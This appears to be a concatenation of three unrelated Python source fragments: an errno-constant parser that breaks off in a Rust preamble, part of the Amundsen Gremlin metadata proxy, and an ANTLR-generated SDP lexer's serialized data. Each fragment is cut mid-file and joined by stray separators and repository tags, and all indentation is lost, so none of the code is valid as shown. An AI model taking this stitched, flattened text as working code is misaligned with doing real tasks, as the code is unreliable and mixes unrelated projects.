def _find_include(base_f_name, base_line_n, inc_rel, include_paths):
for inc_path in include_paths:
inc_full = os.path.join(inc_path, inc_rel)
if os.path.exists(inc_full):
return inc_full
raise RuntimeError(
'%s:%d: File %r not found' % (
base_f_name, base_line_n, inc_rel))
def _read_tokens_from_file(f_name, include_paths, quirks):
no_includes = quirks.get('no_includes', False)
files = [_read_tokens_from_single_file(f_name)]
past_includes = {f_name}
while files:
try:
f_name, line_n, tokens, comments = next(files[-1])
if _match_tokens(
tokens,
(
_T_HASH,
'include',
None,
)):
include, include_re = tokens[2]
if not no_includes:
if include_re == _T_STRING:
cur_include_paths = \
[os.path.dirname(os.path.abspath(f_name))] + \
include_paths
elif include_re == _T_INCLUDE:
cur_include_paths = include_paths
else:
raise RuntimeError(
'%s:%d: Invalid include' % (
f_name, line_n))
if include.group(1) in past_includes:
raise RuntimeError(
'%s:%d: Duplicate include: %r' % (
f_name, line_n, include.group(1)))
past_includes.add(include.group(1))
include = _find_include(f_name, line_n, include.group(1),
cur_include_paths)
files.append(_read_tokens_from_single_file(include))
else:
yield f_name, line_n, tokens, comments
except StopIteration:
files.pop()
def _get_errno_consts(token_lines, quirks):
errno_consts = collections.OrderedDict()
# Saves only first code.
by_num = {}
id_blacklist = quirks.get('id_blacklist', {})
for f_name, line_n, tokens, comments in token_lines:
if _match_tokens(
tokens,
(
_T_HASH,
'undef',
_T_IDENTIFIER,
), False):
ident = tokens[2][0].group(0)
if ident[:1] == 'E':
if ident not in errno_consts:
raise RuntimeError(
'%s:%d: #undef of undefined macro' % (
f_name, line_n))
errno_consts.pop(ident)
continue
elif not _match_tokens(
tokens,
(
_T_HASH,
'define',
None,
None,
), False):
continue
if len(tokens) != 4:
raise RuntimeError(
'%s:%d: Unexpected number of tokens' % (
f_name, line_n))
if tokens[2][1] != _T_IDENTIFIER:
raise RuntimeError(
'%s:%d: Invalid identifier' % (
f_name, line_n))
ident = tokens[2][0].group(0)
if ident in id_blacklist:
continue
if len(ident) < 3:
raise RuntimeError(
'%s:%d: Too short identifier' % (
f_name, line_n))
if ident.upper() != ident:
raise RuntimeError(
'%s:%d: Identifier contains non-capital letters' % (
f_name, line_n))
if ident[0] != 'E':
raise RuntimeError(
'%s:%d: Identifier is not starting with \'E\'' % (
f_name, line_n))
if tokens[3][1] == _T_INT:
num = int(tokens[3][0].group(0))
if num <= 0:
raise RuntimeError(
'%s:%d: Errno code <= 0 (%d)' % (
f_name, line_n, num))
code = num
elif tokens[3][1] == _T_IDENTIFIER:
existing_ident = tokens[3][0].group(0)
existing = errno_consts.get(existing_ident)
if existing is None:
raise RuntimeError(
'%s:%d: Existing errno constant not found (%s)' % (
f_name, line_n, existing_ident))
else:
code = existing_ident
num = existing_ident
while isinstance(num, six.string_types):
num = errno_consts[num]['code']
if not comments:
comments = ['Same as %s (%s)' % (existing_ident,
existing['comment'])]
else:
raise RuntimeError(
'%s:%d: Invalid errno code' % (
f_name, line_n))
if ident in errno_consts:
raise RuntimeError(
'%s:%d: Duplicate definition (%s)' % (
f_name, line_n, ident))
if not comments:
existing_ident = by_num.get(num)
if existing_ident is None:
raise RuntimeError(
'%s:%d: No comments' % (
f_name, line_n))
else:
existing = errno_consts[existing_ident]
comments = ['Same as %s (%s)' % (existing_ident,
existing['comment'])]
if len(comments) > 1:
raise RuntimeError(
'%s:%d: Too many comments' % (
f_name, line_n))
by_num.setdefault(num, ident)
errno_consts[ident] = {
'code': code,
'comment': comments[0].strip()
}
return errno_consts
def _test(token_lines, quirks):
result = {
'tokens': [],
}
def _append_tokens(tl):
for f, l, t, c in tl:
result['tokens'].append(
[
list(map(lambda m: m[0].group(0), t)),
c,
]
)
yield f, l, t, c
try:
result['errno_consts'] = _get_errno_consts(
_append_tokens(token_lines), quirks)
except RuntimeError as error:
sys.stdout.write('ERROR: %s\n' % (error.args[0], ))
sys.stdout.flush()
sys.exit(1)
json.dump(result, sys.stdout, indent=4, separators=(',', ': '),
sort_keys=True)
sys.stdout.write('\n')
sys.stdout.flush()
_PREAMBLE = '''
// This file is generated automatically. Do not modify it by hand.
// For code generated by `phf_codegen`.
#![cfg_attr(feature = "cargo-clippy", allow(unreadable_literal))]
use std;
use | |
<gh_stars>0
# Copyright Contributors to the Amundsen project.
# SPDX-License-Identifier: Apache-2.0
import collections
import json
import logging
from abc import abstractmethod
from datetime import date, datetime, timedelta
from operator import attrgetter
from typing import (Any, Callable, Dict, Iterable, List, Mapping, Optional,
Sequence, Set, Type, TypeVar, Union, no_type_check,
overload)
from urllib.parse import unquote
import gremlin_python
from amundsen_common.models.dashboard import DashboardSummary
from amundsen_common.models.lineage import Lineage
from amundsen_common.models.popular_table import PopularTable
from amundsen_common.models.table import (Application, Column,
ProgrammaticDescription, Reader,
Source, Stat, Table, Tag, Watermark)
from amundsen_common.models.user import User
from amundsen_gremlin.gremlin_model import (EdgeType, EdgeTypes, VertexType,
VertexTypes, WellKnownProperties)
from amundsen_gremlin.gremlin_shared import \
append_traversal as _append_traversal # TODO: rename the references
from amundsen_gremlin.gremlin_shared import (make_column_uri,
make_description_uri)
from amundsen_gremlin.neptune_bulk_loader.gremlin_model_converter import \
ensure_vertex_type
from amundsen_gremlin.script_translator import (
ScriptTranslator, ScriptTranslatorTargetJanusgraph)
from amundsen_gremlin.test_and_development_shard import get_shard
from gremlin_python.driver.client import Client
from gremlin_python.driver.driver_remote_connection import \
DriverRemoteConnection
from gremlin_python.driver.resultset import ResultSet
from gremlin_python.process.anonymous_traversal import traversal
from gremlin_python.process.graph_traversal import (GraphTraversal,
GraphTraversalSource, V,
__, bothV, coalesce,
constant, has, inE, inV,
outE, outV, select, unfold,
valueMap, values)
from gremlin_python.process.traversal import Cardinality
from gremlin_python.process.traversal import Column as MapColumn
from gremlin_python.process.traversal import (Direction, Order, P, T, TextP,
Traversal, gte, not_, within,
without)
from neptune_python_utils.gremlin_utils import ExtendedGraphSONSerializersV3d0
from overrides import overrides
from tornado import httpclient
from typing_extensions import Protocol # TODO: it's in typing 3.8
from metadata_service.entity.dashboard_detail import \
DashboardDetail as DashboardDetailEntity
from metadata_service.entity.description import Description
from metadata_service.entity.resource_type import ResourceType
from metadata_service.entity.tag_detail import TagDetail
from metadata_service.exception import NotFoundException
from metadata_service.proxy.statsd_utilities import timer_with_counter
from metadata_service.util import UserResourceRel
from .base_proxy import BaseProxy
from .shared import checkNotNone, retrying
# don't use statics.load_statics(globals()) it plays badly with mypy
__all__ = ['AbstractGremlinProxy', 'GenericGremlinProxy']
LOGGER = logging.getLogger(__name__)
PUBLISH_TAG_TIME_FORMAT: str = "%Y-%m-%d %H:%M"
AMUNDSEN_TIMESTAMP_KEY: str = 'amundsen_updated_timestamp'
def timestamp() -> datetime:
"""
mostly for mocking
See also https://docs.aws.amazon.com/neptune/latest/userguide/best-practices-gremlin-datetime-glv.html
and DateIO in gremlin python
"""
return datetime.now()
def is_reasonable_vertex_label(label: str) -> bool:
vertex_labels = set([each.value.label for each in VertexTypes])
return label in vertex_labels
def get_label_from(_entity_type_or_enum_or_str: Union[str, VertexTypes, EdgeTypes, VertexType, EdgeType]) -> str:
if isinstance(_entity_type_or_enum_or_str, str):
return _entity_type_or_enum_or_str
elif isinstance(_entity_type_or_enum_or_str, (VertexTypes, EdgeTypes)):
return _entity_type_or_enum_or_str.value.label
elif isinstance(_entity_type_or_enum_or_str, (VertexType, EdgeType)):
return _entity_type_or_enum_or_str.label
else:
raise RuntimeError(f'what the heck is label? {type(_entity_type_or_enum_or_str)} {_entity_type_or_enum_or_str}')
def get_cardinality_for(_entity_type_or_enum: Union[VertexTypes, EdgeTypes, VertexType, EdgeType],
name: str) -> Optional[Cardinality]:
_entity_type: Union[VertexType, EdgeType]
if isinstance(_entity_type_or_enum, (VertexTypes, EdgeTypes)):
_entity_type = _entity_type_or_enum.value
elif isinstance(_entity_type_or_enum, (VertexType, EdgeType)):
_entity_type = _entity_type_or_enum
else:
raise AssertionError(f'thing is not a VertexType(s) or EdgeType(s): {_entity_type_or_enum}')
properties = _entity_type.properties_as_map()
# TODO: this will expose missing properties
if name not in properties:
raise AssertionError(f'missing {name} property in {_entity_type_or_enum} {properties}')
maybe = properties[name].cardinality
if isinstance(_entity_type, VertexType):
return maybe.value if maybe is not None else Cardinality.single
elif isinstance(_entity_type, EdgeType):
return maybe.value if maybe is not None else None
else:
raise AssertionError(f'thing is not a VertexType(s) or EdgeType(s): {_entity_type_or_enum}')
class FromResultSet:
@classmethod
def generator(cls, result_set: ResultSet) -> Iterable[Any]:
for part in result_set:
for item in part:
yield item
@classmethod
def iterate(cls, result_set: ResultSet) -> None:
# haiku for consuming an interator
collections.deque(cls.generator(result_set), maxlen=0)
@classmethod
def next(cls, result_set: ResultSet) -> Any:
"""
really this is like first, but
"""
return next(iter(cls.generator(result_set)))
@classmethod
def toList(cls, result_set: ResultSet) -> List:
return list(cls.generator(result_set))
@classmethod
def toSet(cls, result_set: ResultSet) -> Set:
return set(cls.generator(result_set))
@classmethod
def getOptional(cls, result_set: ResultSet) -> Optional[Any]:
try:
return cls.getOnly(result_set)
except StopIteration:
return None
@classmethod
def getOnly(cls, result_set: ResultSet) -> Any:
i = iter(cls.generator(result_set))
value = next(i)
try:
next(i)
except StopIteration:
return value
raise RuntimeError('Expected one item, but there was more!')
TYPE = TypeVar('TYPE')
class ExecuteQuery(Protocol):
@overload # noqa: F811
def __call__(self, query: Traversal, get: Callable[[ResultSet], V]) -> V:
...
@overload # noqa: F811
def __call__(self, query: str, get: Callable[[ResultSet], V], *, # noqa: F811
bindings: Optional[Mapping[str, Any]] = None) -> V:
...
def __call__(self, query: Union[str, Traversal], get: Callable[[ResultSet], V], *, # noqa: F811
bindings: Optional[Mapping[str, Any]] = None) -> V:
...
class ClientQueryExecutor(ExecuteQuery):
def __init__(self, *, client: Client, traversal_translator: Callable[[Traversal], str]) -> None:
self.client = client
self.traversal_translator = traversal_translator
def __call__(self, query: Union[str, Traversal], get: Callable[[ResultSet], V], *, # noqa: F811
bindings: Optional[Mapping[str, Any]] = None) -> V:
if isinstance(query, Traversal):
if bindings is not None:
raise AssertionError(f'expected bindings to be none')
query_text = self.traversal_translator(query)
else:
query_text = query
if not isinstance(query_text, str):
raise AssertionError(f'expected str')
result_set = self.client.submit(query_text, bindings)
return get(result_set)
class RetryingClientQueryExecutor(ClientQueryExecutor):
def __init__(self, client: Client, traversal_translator: Callable[[Traversal], str],
is_retryable: Callable[[Exception], bool]) -> None:
ClientQueryExecutor.__init__(self, client=client, traversal_translator=traversal_translator)
self.is_retryable = is_retryable
def __enter__(self) -> Any:
return self
def __exit__(self, *args: Any, **kwargs: Any) -> None:
return self.client.close()
# TODO: ideally this would be __call__(*args: Any, **kwargs: Any) -> Any (and then this could be mixinable) but I
# can't get mypy to not think that conflicts
def __call__(self, query: Union[str, Traversal], get: Callable[[ResultSet], V], *,
bindings: Optional[Mapping[str, Any]] = None) -> V:
def callable() -> V:
return ClientQueryExecutor.__call__(self, query, get, bindings=bindings)
try:
return retrying(callable, is_retryable=self.is_retryable)
except Exception as e:
LOGGER.warning(f'got exception executing query={query}, get={get}, bindings={bindings}', exc_info=e)
raise
@no_type_check
def _safe_get_any(root, *keys):
"""
Helper method for getting value from nested dict, special for Gremlin valueMap things where properties can be lists
of one or 0.
:param root:
:param keys:
:return:
"""
current = root
for key in keys:
# first get the only element if it's a list/set
if isinstance(current, Sequence):
if len(current) > 1:
raise RuntimeError(f'{current} is not a singleton! root={root} keys={keys}')
elif len(current) == 0:
current = None
else:
current = current[0]
if not current:
return None
if not isinstance(current, Mapping):
raise RuntimeError(f'{current} is not a Mapping! root={root} keys={keys}')
current = current.get(key)
if not current:
return None
# don't dereference the list this usually is, we might want it or not
return current
@no_type_check
def _safe_get_list(root, *keys, transform: Optional[Callable] = None):
"""
Like _safe_get_any, but for gremlin where we get a list for a single property
"""
values = _safe_get_any(root, *keys)
# is List the only type? it seems so
if values is None:
return None
elif not isinstance(values, List):
raise RuntimeError(f'{values} is not a List! root={root} keys={keys}')
elif transform is None:
return sorted(values)
elif len(values) > 0 and type(values[0]) == datetime and transform == int:
# need to do something special for datetimes we are transforming into int's
return sorted([transform(value.timestamp()) for value in values])
else:
return sorted([transform(value) for value in values])
@no_type_check
def _safe_get(root, *keys, transform: Optional[Callable] = None, default: Any = None):
"""
Like _safe_get_any, but for gremlin where we get a list for a single property
"""
value = _safe_get_list(root, *keys, transform=transform)
if value is None or len(value) == 0:
return default
elif len(value) > 1:
raise RuntimeError(f'{value} is not a singleton! root={root} keys={keys}')
else:
return value[0]
def _properties_or_drop_if_changed_except(
*excludes: str, label: Union[VertexTypes, EdgeTypes, VertexType, EdgeType],
thing: Union[object, Dict[str, Any]], existing: Union[object, Dict[str, Any]]) -> GraphTraversal:
if isinstance(thing, Mapping):
_thing = thing
elif hasattr(thing, '__dict__'):
_thing = vars(thing)
else:
raise AssertionError(f'thing must be a dict or have __dict__: {type(thing)}')
if isinstance(existing, Mapping):
_existing = existing
elif hasattr(existing, '__dict__'):
_existing = vars(existing)
else:
raise AssertionError(f'existing must be a dict or have __dict__: {type(existing)}')
def p(name: str) -> Optional[GraphTraversal]:
return _property_or_drop_if_changed(name=name, value=_thing.get(name, None), existing=_existing.get(name, None),
cardinality=get_cardinality_for(label, name))
names = sorted(set(_thing.keys()).difference(set(excludes)))
traversals = [t for t in [p(name) for name in names] if t is not None]
return _append_traversal(__.start(), *traversals) if traversals else None
def _property_unchanged(*, value: Any, existing: Any, cardinality: Optional[Cardinality]) -> bool:
# this is the usual case: either an Edge property (no cardinality) or Vertex property with Cardinality.single
if existing is None:
return value is None
elif cardinality is None or cardinality == Cardinality.single:
return tuple(existing) == (value,)
elif cardinality in (Cardinality.set_, Cardinality.list_):
return value in tuple(existing)
else:
return False
def _property_or_drop_if_changed(*, name: str, value: Any, existing: Any, cardinality: Optional[Cardinality]) \
-> Optional[GraphTraversal]:
"""
You want to use _vertex_property or _edge_property.
"""
if _property_unchanged(value=value, existing=existing, cardinality=cardinality):
return None
elif value is None:
return __.sideEffect(__.properties(name).drop())
else:
# complicated: edges can't have cardinality supplied and are implied to be single
if cardinality is None:
return __.property(name, value)
else:
return __.property(cardinality, name, value)
def _properties_or_drop_except(label: Union[VertexTypes, EdgeTypes, VertexType, EdgeType],
thing: Union[object, Dict[str, Any]], *excludes: str) -> GraphTraversal:
if isinstance(thing, Mapping):
pass
elif hasattr(thing, '__dict__'):
thing = vars(thing)
else:
raise AssertionError(f'must be a dict or have __dict__: {type(thing)}')
g = __.start()
for name in set(thing.keys()).difference(set(excludes)):
g = _property_or_drop(g=g, name=name, value=thing.get(name, None), cardinality=get_cardinality_for(label, name))
return g
def _properties_or_drop_of(label: Union[VertexTypes, EdgeTypes, VertexType, EdgeType],
thing: Union[object, Dict[str, Any]], *includes: str) -> GraphTraversal:
if isinstance(thing, Mapping):
| |
<reponame>cameronelliott/sdp-antlr-abnf
# Generated from sdp.g4 by ANTLR 4.8
from antlr4 import *
from io import StringIO
from typing.io import TextIO
import sys
def serializedATN():
with StringIO() as buf:
buf.write("\3\u608b\ua72a\u8133\ub9ed\u417c\u3be7\u7786\u5964\2\u0102")
buf.write("\u0403\b\1\4\2\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6\t\6\4\7")
buf.write("\t\7\4\b\t\b\4\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f\4\r\t\r")
buf.write("\4\16\t\16\4\17\t\17\4\20\t\20\4\21\t\21\4\22\t\22\4\23")
buf.write("\t\23\4\24\t\24\4\25\t\25\4\26\t\26\4\27\t\27\4\30\t\30")
buf.write("\4\31\t\31\4\32\t\32\4\33\t\33\4\34\t\34\4\35\t\35\4\36")
buf.write("\t\36\4\37\t\37\4 \t \4!\t!\4\"\t\"\4#\t#\4$\t$\4%\t%")
buf.write("\4&\t&\4\'\t\'\4(\t(\4)\t)\4*\t*\4+\t+\4,\t,\4-\t-\4.")
buf.write("\t.\4/\t/\4\60\t\60\4\61\t\61\4\62\t\62\4\63\t\63\4\64")
buf.write("\t\64\4\65\t\65\4\66\t\66\4\67\t\67\48\t8\49\t9\4:\t:")
buf.write("\4;\t;\4<\t<\4=\t=\4>\t>\4?\t?\4@\t@\4A\tA\4B\tB\4C\t")
buf.write("C\4D\tD\4E\tE\4F\tF\4G\tG\4H\tH\4I\tI\4J\tJ\4K\tK\4L\t")
buf.write("L\4M\tM\4N\tN\4O\tO\4P\tP\4Q\tQ\4R\tR\4S\tS\4T\tT\4U\t")
buf.write("U\4V\tV\4W\tW\4X\tX\4Y\tY\4Z\tZ\4[\t[\4\\\t\\\4]\t]\4")
buf.write("^\t^\4_\t_\4`\t`\4a\ta\4b\tb\4c\tc\4d\td\4e\te\4f\tf\4")
buf.write("g\tg\4h\th\4i\ti\4j\tj\4k\tk\4l\tl\4m\tm\4n\tn\4o\to\4")
buf.write("p\tp\4q\tq\4r\tr\4s\ts\4t\tt\4u\tu\4v\tv\4w\tw\4x\tx\4")
buf.write("y\ty\4z\tz\4{\t{\4|\t|\4}\t}\4~\t~\4\177\t\177\4\u0080")
buf.write("\t\u0080\4\u0081\t\u0081\4\u0082\t\u0082\4\u0083\t\u0083")
buf.write("\4\u0084\t\u0084\4\u0085\t\u0085\4\u0086\t\u0086\4\u0087")
buf.write("\t\u0087\4\u0088\t\u0088\4\u0089\t\u0089\4\u008a\t\u008a")
buf.write("\4\u008b\t\u008b\4\u008c\t\u008c\4\u008d\t\u008d\4\u008e")
buf.write("\t\u008e\4\u008f\t\u008f\4\u0090\t\u0090\4\u0091\t\u0091")
buf.write("\4\u0092\t\u0092\4\u0093\t\u0093\4\u0094\t\u0094\4\u0095")
buf.write("\t\u0095\4\u0096\t\u0096\4\u0097\t\u0097\4\u0098\t\u0098")
buf.write("\4\u0099\t\u0099\4\u009a\t\u009a\4\u009b\t\u009b\4\u009c")
buf.write("\t\u009c\4\u009d\t\u009d\4\u009e\t\u009e\4\u009f\t\u009f")
buf.write("\4\u00a0\t\u00a0\4\u00a1\t\u00a1\4\u00a2\t\u00a2\4\u00a3")
buf.write("\t\u00a3\4\u00a4\t\u00a4\4\u00a5\t\u00a5\4\u00a6\t\u00a6")
buf.write("\4\u00a7\t\u00a7\4\u00a8\t\u00a8\4\u00a9\t\u00a9\4\u00aa")
buf.write("\t\u00aa\4\u00ab\t\u00ab\4\u00ac\t\u00ac\4\u00ad\t\u00ad")
buf.write("\4\u00ae\t\u00ae\4\u00af\t\u00af\4\u00b0\t\u00b0\4\u00b1")
buf.write("\t\u00b1\4\u00b2\t\u00b2\4\u00b3\t\u00b3\4\u00b4\t\u00b4")
buf.write("\4\u00b5\t\u00b5\4\u00b6\t\u00b6\4\u00b7\t\u00b7\4\u00b8")
buf.write("\t\u00b8\4\u00b9\t\u00b9\4\u00ba\t\u00ba\4\u00bb\t\u00bb")
buf.write("\4\u00bc\t\u00bc\4\u00bd\t\u00bd\4\u00be\t\u00be\4\u00bf")
buf.write("\t\u00bf\4\u00c0\t\u00c0\4\u00c1\t\u00c1\4\u00c2\t\u00c2")
buf.write("\4\u00c3\t\u00c3\4\u00c4\t\u00c4\4\u00c5\t\u00c5\4\u00c6")
buf.write("\t\u00c6\4\u00c7\t\u00c7\4\u00c8\t\u00c8\4\u00c9\t\u00c9")
buf.write("\4\u00ca\t\u00ca\4\u00cb\t\u00cb\4\u00cc\t\u00cc\4\u00cd")
buf.write("\t\u00cd\4\u00ce\t\u00ce\4\u00cf\t\u00cf\4\u00d0\t\u00d0")
buf.write("\4\u00d1\t\u00d1\4\u00d2\t\u00d2\4\u00d3\t\u00d3\4\u00d4")
buf.write("\t\u00d4\4\u00d5\t\u00d5\4\u00d6\t\u00d6\4\u00d7\t\u00d7")
buf.write("\4\u00d8\t\u00d8\4\u00d9\t\u00d9\4\u00da\t\u00da\4\u00db")
buf.write("\t\u00db\4\u00dc\t\u00dc\4\u00dd\t\u00dd\4\u00de\t\u00de")
buf.write("\4\u00df\t\u00df\4\u00e0\t\u00e0\4\u00e1\t\u00e1\4\u00e2")
buf.write("\t\u00e2\4\u00e3\t\u00e3\4\u00e4\t\u00e4\4\u00e5\t\u00e5")
buf.write("\4\u00e6\t\u00e6\4\u00e7\t\u00e7\4\u00e8\t\u00e8\4\u00e9")
buf.write("\t\u00e9\4\u00ea\t\u00ea\4\u00eb\t\u00eb\4\u00ec\t\u00ec")
buf.write("\4\u00ed\t\u00ed\4\u00ee\t\u00ee\4\u00ef\t\u00ef\4\u00f0")
buf.write("\t\u00f0\4\u00f1\t\u00f1\4\u00f2\t\u00f2\4\u00f3\t\u00f3")
buf.write("\4\u00f4\t\u00f4\4\u00f5\t\u00f5\4\u00f6\t\u00f6\4\u00f7")
buf.write("\t\u00f7\4\u00f8\t\u00f8\4\u00f9\t\u00f9\4\u00fa\t\u00fa")
buf.write("\4\u00fb\t\u00fb\4\u00fc\t\u00fc\4\u00fd\t\u00fd\4\u00fe")
buf.write("\t\u00fe\4\u00ff\t\u00ff\4\u0100\t\u0100\4\u0101\t\u0101")
buf.write("\3\2\3\2\3\3\3\3\3\4\3\4\3\5\3\5\3\6\3\6\3\7\3\7\3\b\3")
buf.write("\b\3\t\3\t\3\n\3\n\3\13\3\13\3\f\3\f\3\r\3\r\3\16\3\16")
buf.write("\3\17\3\17\3\20\3\20\3\21\3\21\3\22\3\22\3\23\3\23\3\24")
buf.write("\3\24\3\25\3\25\3\26\3\26\3\27\3\27\3\30\3\30\3\31\3\31")
buf.write("\3\32\3\32\3\33\3\33\3\34\3\34\3\35\3\35\3\36\3\36\3\37")
buf.write("\3\37\3 \3 \3!\3!\3\"\3\"\3#\3#\3$\3$\3%\3%\3&\3&\3\'")
buf.write("\3\'\3(\3(\3)\3)\3*\3*\3+\3+\3,\3,\3-\3-\3.\3.\3/\3/\3")
buf.write("\60\3\60\3\61\3\61\3\62\3\62\3\63\3\63\3\64\3\64\3\65")
buf.write("\3\65\3\66\3\66\3\67\3\67\38\38\39\39\3:\3:\3;\3;\3<\3")
buf.write("<\3=\3=\3>\3>\3?\3?\3@\3@\3A\3A\3B\3B\3C\3C\3D\3D\3E\3")
buf.write("E\3F\3F\3G\3G\3H\3H\3I\3I\3J\3J\3K\3K\3L\3L\3M\3M\3N\3")
buf.write("N\3O\3O\3P\3P\3Q\3Q\3R\3R\3S\3S\3T\3T\3U\3U\3V\3V\3W\3")
buf.write("W\3X\3X\3Y\3Y\3Z\3Z\3[\3[\3\\\3\\\3]\3]\3^\3^\3_\3_\3")
buf.write("`\3`\3a\3a\3b\3b\3c\3c\3d\3d\3e\3e\3f\3f\3g\3g\3h\3h\3")
buf.write("i\3i\3j\3j\3k\3k\3l\3l\3m\3m\3n\3n\3o\3o\3p\3p\3q\3q\3")
buf.write("r\3r\3s\3s\3t\3t\3u\3u\3v\3v\3w\3w\3x\3x\3y\3y\3z\3z\3")
buf.write("{\3{\3|\3|\3}\3}\3~\3~\3\177\3\177\3\u0080\3\u0080\3\u0081")
buf.write("\3\u0081\3\u0082\3\u0082\3\u0083\3\u0083\3\u0084\3\u0084")
buf.write("\3\u0085\3\u0085\3\u0086\3\u0086\3\u0087\3\u0087\3\u0088")
buf.write("\3\u0088\3\u0089\3\u0089\3\u008a\3\u008a\3\u008b\3\u008b")
buf.write("\3\u008c\3\u008c\3\u008d\3\u008d\3\u008e\3\u008e\3\u008f")
buf.write("\3\u008f\3\u0090\3\u0090\3\u0091\3\u0091\3\u0092\3\u0092")
buf.write("\3\u0093\3\u0093\3\u0094\3\u0094\3\u0095\3\u0095\3\u0096")
buf.write("\3\u0096\3\u0097\3\u0097\3\u0098\3\u0098\3\u0099\3\u0099")
buf.write("\3\u009a\3\u009a\3\u009b\3\u009b\3\u009c\3\u009c\3\u009d")
buf.write("\3\u009d\3\u009e\3\u009e\3\u009f\3\u009f\3\u00a0\3\u00a0")
buf.write("\3\u00a1\3\u00a1\3\u00a2\3\u00a2\3\u00a3\3\u00a3\3\u00a4")
buf.write("\3\u00a4\3\u00a5\3\u00a5\3\u00a6\3\u00a6\3\u00a7\3\u00a7")
buf.write("\3\u00a8\3\u00a8\3\u00a9\3\u00a9\3\u00aa\3\u00aa\3\u00ab")
buf.write("\3\u00ab\3\u00ac\3\u00ac\3\u00ad\3\u00ad\3\u00ae\3\u00ae")
buf.write("\3\u00af\3\u00af\3\u00b0\3\u00b0\3\u00b1\3\u00b1\3\u00b2")
buf.write("\3\u00b2\3\u00b3\3\u00b3\3\u00b4\3\u00b4\3\u00b5\3\u00b5")
buf.write("\3\u00b6\3\u00b6\3\u00b7\3\u00b7\3\u00b8\3\u00b8\3\u00b9")
buf.write("\3\u00b9\3\u00ba\3\u00ba\3\u00bb\3\u00bb\3\u00bc\3\u00bc")
buf.write("\3\u00bd\3\u00bd\3\u00be\3\u00be\3\u00bf\3\u00bf\3\u00c0")
buf.write("\3\u00c0\3\u00c1\3\u00c1\3\u00c2\3\u00c2\3\u00c3\3\u00c3")
buf.write("\3\u00c4\3\u00c4\3\u00c5\3\u00c5\3\u00c6\3\u00c6\3\u00c7")
buf.write("\3\u00c7\3\u00c8\3\u00c8\3\u00c9\3\u00c9\3\u00ca\3\u00ca")
buf.write("\3\u00cb\3\u00cb\3\u00cc\3\u00cc\3\u00cd\3\u00cd\3\u00ce")
buf.write("\3\u00ce\3\u00cf\3\u00cf\3\u00d0\3\u00d0\3\u00d1\3\u00d1")
buf.write("\3\u00d2\3\u00d2\3\u00d3\3\u00d3\3\u00d4\3\u00d4\3\u00d5")
buf.write("\3\u00d5\3\u00d6\3\u00d6\3\u00d7\3\u00d7\3\u00d8\3\u00d8")
buf.write("\3\u00d9\3\u00d9\3\u00da\3\u00da\3\u00db\3\u00db\3\u00dc")
buf.write("\3\u00dc\3\u00dd\3\u00dd\3\u00de\3\u00de\3\u00df\3\u00df")
buf.write("\3\u00e0\3\u00e0\3\u00e1\3\u00e1\3\u00e2\3\u00e2\3\u00e3")
buf.write("\3\u00e3\3\u00e4\3\u00e4\3\u00e5\3\u00e5\3\u00e6\3\u00e6")
buf.write("\3\u00e7\3\u00e7\3\u00e8\3\u00e8\3\u00e9\3\u00e9\3\u00ea")
buf.write("\3\u00ea\3\u00eb\3\u00eb\3\u00ec\3\u00ec\3\u00ed\3\u00ed")
buf.write("\3\u00ee\3\u00ee\3\u00ef\3\u00ef\3\u00f0\3\u00f0\3\u00f1")
buf.write("\3\u00f1\3\u00f2\3\u00f2\3\u00f3\3\u00f3\3\u00f4\3\u00f4")
buf.write("\3\u00f5\3\u00f5\3\u00f6\3\u00f6\3\u00f7\3\u00f7\3\u00f8")
buf.write("\3\u00f8\3\u00f9\3\u00f9\3\u00fa\3\u00fa\3\u00fb\3\u00fb")
buf.write("\3\u00fc\3\u00fc\3\u00fd\3\u00fd\3\u00fe\3\u00fe\3\u00ff")
buf.write("\3\u00ff\3\u0100\3\u0100\3\u0101\3\u0101\2\2\u0102\3\3")
buf.write("\5\4\7\5\t\6\13\7\r\b\17\t\21\n\23\13\25\f\27\r\31\16")
buf.write("\33\17\35\20\37\21!\22#\23%\24\'\25)\26+\27-\30/\31\61")
buf.write("\32\63\33\65\34\67\359\36;\37= ?!A\"C#E$G%I&K\'M(O)Q*")
buf.write("S+U,W-Y.[/]\60_\61a\62c\63e\64g\65i\66k\67m8o9q:s;u<w")
buf.write("=y>{?}@\177A\u0081B\u0083C\u0085D\u0087E\u0089F\u008b")
buf.write("G\u008dH\u008fI\u0091J\u0093K\u0095L\u0097M\u0099N\u009b")
buf.write("O\u009dP\u009fQ\u00a1R\u00a3S\u00a5T\u00a7U\u00a9V\u00ab")
buf.write("W\u00adX\u00afY\u00b1Z\u00b3[\u00b5\\\u00b7]\u00b9^\u00bb")
buf.write("_\u00bd`\u00bfa\u00c1b\u00c3c\u00c5d\u00c7e\u00c9f\u00cb")
buf.write("g\u00cdh\u00cfi\u00d1j\u00d3k\u00d5l\u00d7m\u00d9n\u00db")
buf.write("o\u00ddp\u00dfq\u00e1r\u00e3s\u00e5t\u00e7u\u00e9v\u00eb")
buf.write("w\u00edx\u00efy\u00f1z\u00f3{\u00f5|\u00f7}\u00f9~\u00fb")
buf.write("\177\u00fd\u0080\u00ff\u0081\u0101\u0082\u0103\u0083\u0105")
buf.write("\u0084\u0107\u0085\u0109\u0086\u010b\u0087\u010d\u0088")
buf.write("\u010f\u0089\u0111\u008a\u0113\u008b\u0115\u008c\u0117")
buf.write("\u008d\u0119\u008e\u011b\u008f\u011d\u0090\u011f\u0091")
buf.write("\u0121\u0092\u0123\u0093\u0125\u0094\u0127\u0095\u0129")
buf.write("\u0096\u012b\u0097\u012d\u0098\u012f\u0099\u0131\u009a")
buf.write("\u0133\u009b\u0135\u009c\u0137\u009d\u0139\u009e\u013b")
buf.write("\u009f\u013d\u00a0\u013f\u00a1\u0141\u00a2\u0143\u00a3")
buf.write("\u0145\u00a4\u0147\u00a5\u0149\u00a6\u014b\u00a7\u014d")
buf.write("\u00a8\u014f\u00a9\u0151\u00aa\u0153\u00ab\u0155\u00ac")
buf.write("\u0157\u00ad\u0159\u00ae\u015b\u00af\u015d\u00b0\u015f")
buf.write("\u00b1\u0161\u00b2\u0163\u00b3\u0165\u00b4\u0167\u00b5")
buf.write("\u0169\u00b6\u016b\u00b7\u016d\u00b8\u016f\u00b9\u0171")
buf.write("\u00ba\u0173\u00bb\u0175\u00bc\u0177\u00bd\u0179\u00be")
buf.write("\u017b\u00bf\u017d\u00c0\u017f\u00c1\u0181\u00c2\u0183")
buf.write("\u00c3\u0185\u00c4\u0187\u00c5\u0189\u00c6\u018b\u00c7")
buf.write("\u018d\u00c8\u018f\u00c9\u0191\u00ca\u0193\u00cb\u0195")
